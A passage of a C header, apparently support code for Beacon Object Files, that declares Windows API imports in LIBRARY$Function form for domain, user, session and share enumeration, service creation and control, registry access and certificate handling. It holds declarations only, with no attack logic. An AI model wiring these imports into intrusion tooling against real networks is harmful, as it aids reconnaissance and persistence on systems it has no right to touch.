DECLSPEC_IMPORT unsigned long __stdcall WSOCK32$inet_addr(const char *cp); 161 | 162 | //NETAPI32 163 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 164 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr); 165 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserModalsGet(LPCWSTR servername,DWORD level,LPBYTE *bufptr); 166 | WINBASEAPI DWORD WINAPI NETAPI32$NetServerEnum(LMCSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,DWORD servertype,LMCSTR domain,LPDWORD resume_handle); 167 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetGroups(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 168 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetLocalGroups(LPCWSTR servername,LPCWSTR username,DWORD level,DWORD flags,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 169 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 170 | WINBASEAPI DWORD WINAPI NETAPI32$NetGetAnyDCName(LPCWSTR servername,LPCWSTR domainname,LPBYTE *bufptr); 171 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserEnum(LPCWSTR servername,DWORD level,DWORD filter,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 172 | WINBASEAPI DWORD WINAPI NETAPI32$NetGroupGetUsers(LPCWSTR servername,LPCWSTR groupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR ResumeHandle); 173 | WINBASEAPI DWORD WINAPI NETAPI32$NetQueryDisplayInformation(LPCWSTR ServerName,DWORD Level,DWORD Index,DWORD EntriesRequested,DWORD PreferredMaximumLength,LPDWORD ReturnedEntryCount,PVOID *SortedBuffer); 174 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupEnum(LPCWSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 175 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupGetMembers(LPCWSTR servername,LPCWSTR localgroupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 176 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserSetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE buf,LPDWORD parm_err); 177 | WINBASEAPI DWORD WINAPI NETAPI32$NetShareEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 178 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 179 | WINBASEAPI DWORD WINAPI NETAPI32$NetSessionEnum(LPCWSTR servername, LPCWSTR UncClientName, LPCWSTR username, DWORD level, LPBYTE* bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resumehandle); 180 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaUserEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resumehandle); 181 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaGetInfo(LMSTR servername,DWORD level,LPBYTE *bufptr); 182 | WINBASEAPI DWORD WINAPI NETAPI32$NetStatisticsGet(LMSTR server,LMSTR service,DWORD level,DWORD options,LPBYTE *bufptr); 183 | WINBASEAPI DWORD WINAPI NETAPI32$NetRemoteTOD(LPCWSTR UncServerName,LPBYTE *BufferPtr); 184 | 185 | //mpr 186 | WINBASEAPI DWORD WINAPI MPR$WNetOpenEnumW(DWORD dwScope, DWORD dwType, DWORD dwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum); 187 | WINBASEAPI DWORD WINAPI MPR$WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcCount, LPVOID lpBuffer, LPDWORD lpBufferSize); 188 | WINBASEAPI DWORD WINAPI MPR$WNetCloseEnum(HANDLE hEnum); 189 | WINBASEAPI DWORD WINAPI MPR$WNetGetNetworkInformationW(LPCWSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct); 190 | WINBASEAPI DWORD WINAPI MPR$WNetGetConnectionW(LPCWSTR lpLocalName, LPWSTR lpRemoteName, LPDWORD lpnLength); 191 | WINBASEAPI DWORD WINAPI MPR$WNetGetResourceInformationW(LPNETRESOURCEW lpNetResource, LPVOID lpBuffer, LPDWORD lpcbBuffer, LPWSTR *lplpSystem); 192 | WINBASEAPI DWORD WINAPI MPR$WNetGetUserW(LPCWSTR lpName, LPWSTR lpUserName, LPDWORD lpnLength); 193 | WINBASEAPI DWORD WINAPI MPR$WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD dwFlags); 194 | WINBASEAPI DWORD WINAPI MPR$WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce); 195 | 196 | //user32 197 | WINUSERAPI int WINAPI USER32$EnumDesktopWindows(HDESK hDesktop,WNDENUMPROC lpfn,LPARAM lParam); 198 | WINUSERAPI int WINAPI USER32$IsWindowVisible (HWND hWnd); 199 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd,LPSTR lpString,int nMaxCount); 200 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd,LPSTR lpClassName,int nMaxCount); 201 | WINUSERAPI LPWSTR WINAPI USER32$CharPrevW(LPCWSTR lpszStart,LPCWSTR lpszCurrent); 202 | WINUSERAPI HWND WINAPI USER32$FindWindowExA (HWND hWndParent, HWND hWndChildAfter, LPCSTR lpszClass, LPCSTR lpszWindow); 203 | WINUSERAPI LRESULT WINAPI USER32$SendMessageA (HWND hwnd, UINT Msg, WPARAM wParam, LPARAM lParam); 204 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd, LPSTR lpString, int nMaxCount); 205 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd, LPTSTR lpClassName, int nMaxCount); 206 | WINUSERAPI BOOL WINAPI USER32$EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); 207 | 208 | //secur32 209 | WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExA (int NameFormat, LPSTR lpNameBuffer, PULONG nSize); 210 | 211 | //shlwapi 212 | WINBASEAPI LPSTR WINAPI SHLWAPI$StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch); 213 | WINBASEAPI int WINAPI SHLWAPI$SHFormatDateTimeA(const FILETIME *pft, DWORD *pdwFlags, LPSTR *pszBuf, UINT cchBuf); 214 | 215 | //advapi32 216 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 217 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 218 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID Sid,LPSTR *StringSid); 219 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(LPCWSTR StringSecurityDescriptor,DWORD StringSDRevision,PSECURITY_DESCRIPTOR *SecurityDescriptor,PULONG SecurityDescriptorSize); 220 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidA (LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 221 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 222 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeNameA (LPCSTR lpSystemName, PLUID lpLuid, LPSTR lpName, LPDWORD cchName); 223 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeDisplayNameA (LPCSTR lpSystemName, LPCSTR lpName, LPSTR lpDisplayName, LPDWORD cchDisplayName, LPDWORD lpLanguageId); 224 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess); 225 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess); 226 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService,LPSERVICE_STATUS lpServiceStatus); 227 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGA lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 228 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 229 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExA(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCSTR pszGroupName); 230 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService,SC_STATUS_TYPE InfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 231 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 232 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPVOID lpInfo); 233 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName); 234 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword); 235 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 236 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult); 237 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExW(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCWSTR pszGroupName); 238 | WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 239 | WINADVAPI LONG WINAPI ADVAPI32$RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,CONST BYTE *lpData,DWORD cbData); 240 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult); 241 | WINADVAPI LONG WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR lpMachineName,HKEY hKey,PHKEY phkResult); 242 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY hKey); 243 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 244 | WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition); 245 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyExA(HKEY hKey,LPCSTR lpSubKey,REGSAM samDesired,DWORD Reserved); 246 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyValueA(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName); 247 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 248 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey,LPSTR lpClass,LPDWORD lpcchClass,LPDWORD lpReserved,LPDWORD lpcSubKeys,LPDWORD lpcbMaxSubKeyLen,LPDWORD lpcbMaxClassLen,LPDWORD lpcValues,LPDWORD lpcbMaxValueNameLen,LPDWORD lpcbMaxValueLen,LPDWORD lpcbSecurityDescriptor,PFILETIME lpftLastWriteTime); 249 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumValueA(HKEY hKey,DWORD dwIndex,LPSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 250 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumKeyExA(HKEY hKey,DWORD dwIndex,LPSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime); 251 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteValueA(HKEY hKey,LPCSTR lpValueName); 252 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 253 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyExA(HKEY hKey,LPCSTR lpFile,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD Flags); 254 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetFileSecurityW (LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded); 255 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorOwner (PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID *pOwner, LPBOOL lpbOwnerDefaulted); 256 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbDaclPresent, PACL *pDacl, LPBOOL lpbDaclDefaulted); 257 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAclInformation (PACL pAcl, LPVOID pAclInformation, DWORD nAclInformationLength, ACL_INFORMATION_CLASS dwAclInformationClass); 258 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAce (PACL pAcl, DWORD dwAceIndex, LPVOID *pAce); 259 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 260 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidW(PSID Sid,LPWSTR *StringSid); 261 | WINADVAPI VOID WINAPI ADVAPI32$MapGenericMask (PDWORD AccessMask, PGENERIC_MAPPING GenericMapping); 262 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 263 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 264 | WINADVAPI WINBOOL WINAPI ADVAPI32$InitializeSecurityDescriptor (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision); 265 | WINADVAPI WINBOOL WINAPI ADVAPI32$SetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, WINBOOL bDaclPresent, PACL pDacl, WINBOOL bDaclDefaulted); 266 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW(PSECURITY_DESCRIPTOR SecurityDescriptor,DWORD RequestedStringSDRevision,SECURITY_INFORMATION SecurityInformation,LPWSTR *StringSecurityDescriptor,PULONG StringSecurityDescriptorLen); 267 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors); 268 | WINADVAPI WINBOOL WINAPI ADVAPI32$ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus); 269 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumDependentServicesA(SC_HANDLE hService,DWORD dwServiceState,LPENUM_SERVICE_STATUSA lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned); 270 | WINADVAPI LSTATUS WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey, LPSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcbMaxSubKeyLen, LPDWORD lpcbMaxClassLen, LPDWORD lpcValues, LPDWORD lpcbMaxValueNameLen, LPDWORD lpcbMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime); 271 | 272 | //NTDLL 273 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateFile(PHANDLE FileHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK IoStatusBlock,PLARGE_INTEGER AllocationSize,ULONG FileAttributes,ULONG ShareAccess,ULONG CreateDisposition,ULONG CreateOptions,PVOID EaBuffer,ULONG EaLength); 274 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle); 275 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtFsControlFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,ULONG IoControlCode,PVOID InputBuffer,ULONG InputBufferLength,PVOID OutputBuffer,ULONG OutputBufferLength); 276 | 277 | //IMAGEHLP 278 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageEnumerateCertificates(HANDLE FileHandle,WORD TypeFilter,PDWORD CertificateCount,PDWORD Indices,DWORD IndexCount); 279 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateHeader(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificateheader); 280 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateData(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificate,PDWORD RequiredLength); 281 | 282 | //crypt32 283 | WINIMPM WINBOOL WINAPI CRYPT32$CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert); 284 | WINIMPM DWORD WINAPI CRYPT32$CertGetNameStringW (PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString); 285 | WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext (DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded); 286 | WINIMPM WINBOOL WINAPI CRYPT32$CertFreeCertificateContext (PCCERT_CONTEXT pCertContext); 287 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateContextProperty (PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData); 288 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateChain (HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext); 289 | WINIMPM VOID WINAPI CRYPT32$CertFreeCertificateChain (PCCERT_CHAIN_CONTEXT pChainContext); 290 | WINIMPM PCCRYPT_OID_INFO WINAPI CRYPT32$CryptFindOIDInfo (DWORD dwKeyType, void *pvKey, DWORD dwGroupId); 291 | 292 | //WS2_32 293 | // defining this here to avoid including ws2tcpip.h which results in include order warnings when bofs include windows.h before bofdefs.h 294 | typedef struct addrinfo { 295 | int ai_flags; 296 | int ai_family; 297 | int ai_socktype; 298 | int ai_protocol; 299 | size_t ai_addrlen; 300 | char *ai_canonname; 301 | struct sockaddr *ai_addr; 302 | struct addrinfo *ai_next; 303 | } ADDRINFOA,*PADDRINFOA; 304 | 305 | //WS2_32 306 | DECLSPEC_IMPORT int __stdcall WS2_32$connect(SOCKET sock, const struct sockaddr* name, int namelen); 307 | DECLSPEC_IMPORT int __stdcall WS2_32$closesocket(SOCKET sock); 308 | DECLSPEC_IMPORT void __stdcall WS2_32$freeaddrinfo(struct addrinfo* ai); 309 | DECLSPEC_IMPORT int __stdcall WS2_32$getaddrinfo(char* host, char* port, const struct addrinfo* hints, struct addrinfo** result); 310 | DECLSPEC_IMPORT u_long __stdcall WS2_32$htonl(u_long hostlong); 311 | DECLSPEC_IMPORT u_short __stdcall WS2_32$htons(u_short hostshort); 312 | DECLSPEC_IMPORT char * __stdcall WS2_32$inet_ntoa(struct in_addr in); 313 | DECLSPEC_IMPORT int __stdcall WS2_32$ioctlsocket(SOCKET sock, long cmd, u_long* arg); 314 | DECLSPEC_IMPORT int __stdcall WS2_32$select(int nfds, fd_set* readfds, fd_set* writefds, fd_set* exceptfds, const struct timeval* timeout); 315 | DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol); 316 | DECLSPEC_IMPORT int __stdcall WS2_32$__WSAFDIsSet(SOCKET sock, struct fd_set* fdset); 317 | DECLSPEC_IMPORT int __stdcall WS2_32$WSAGetLastError(); 318 | DECLSPEC_IMPORT LPCWSTR WINAPI WS2_32$InetNtopW(INT Family, LPCVOID pAddr, LPWSTR pStringBuf, size_t StringBufSIze); 319 | DECLSPEC_IMPORT INT WINAPI WS2_32$inet_pton(INT Family, LPCSTR pStringBuf, PVOID pAddr); 320 | 321 | //dnsapi 322 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 323 | DECLSPEC_IMPORT int WINAPI DNSAPI$DnsGetCacheDataTable(PVOID data); 324 | 325 | //OLE32 326 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit); 327 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize (void); 328 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3); 329 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 330 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString (LPCOLESTR lpsz, LPCLSID pclsid); 331 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString (LPCOLESTR lpsz, LPIID lpiid); 332 | DECLSPEC_IMPORT int WINAPI OLE32$StringFromGUID2 (REFGUID rguid, LPOLESTR lpsz, int cchMax); 333 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities); 334 | DECLSPEC_IMPORT LPVOID WINAPI OLE32$CoTaskMemAlloc(SIZE_T cb); 335 | DECLSPEC_IMPORT void WINAPI OLE32$CoTaskMemFree(LPVOID pv); 336 | 337 | //OLEAUT32 338 | DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 339 | DECLSPEC_IMPORT INT WINAPI OLEAUT32$SysReAllocString(BSTR *, const OLECHAR *); 340 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR); 341 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SysStringLen(BSTR); 342 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg); 343 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg); 344 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SysAddRefString(BSTR); 345 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest, VARIANTARG *pvarSrc, USHORT wFlags, VARTYPE vt); 346 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VarFormatDateTime(LPVARIANT pvarIn,int iNamedFormat,ULONG dwFlags,BSTR *pbstrOut); 347 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa); 348 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa); 349 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound); 350 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound); 351 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv); 352 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa); 353 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData); 354 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa); 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | //CERTCLI 364 | /* 365 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumFirstCA(IN LPCWSTR wszScope, IN DWORD dwFlags, OUT LPVOID * phCAInfo); 366 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCA(IN LPVOID hPrevCA, OUT LPVOID * phCAInfo); 367 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCA(IN LPVOID hCA); 368 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCAs(IN LPVOID hCAInfo); 369 | DECLSPEC_IMPORT LPCWSTR WINAPI CERTCLI$CAGetDN(IN LPVOID hCAInfo); 370 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAProperty(IN LPVOID hCAInfo, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 371 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCAProperty(IN LPVOID hCAInfo, IN PZPWSTR awszPropertyValue); 372 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAFlags(IN LPVOID hCAInfo, OUT DWORD *pdwFlags); 373 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCACertificate(IN LPVOID hCAInfo, OUT PCCERT_CONTEXT *ppCert); 374 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAExpiration(IN LPVOID hCAInfo, OUT DWORD * pdwExpiration, OUT DWORD * pdwUnits); 375 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCASecurity(IN LPVOID hCAInfo, OUT PSECURITY_DESCRIPTOR * ppSD); 376 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetAccessRights(IN LPVOID hCAInfo, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 377 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypesForCA(IN 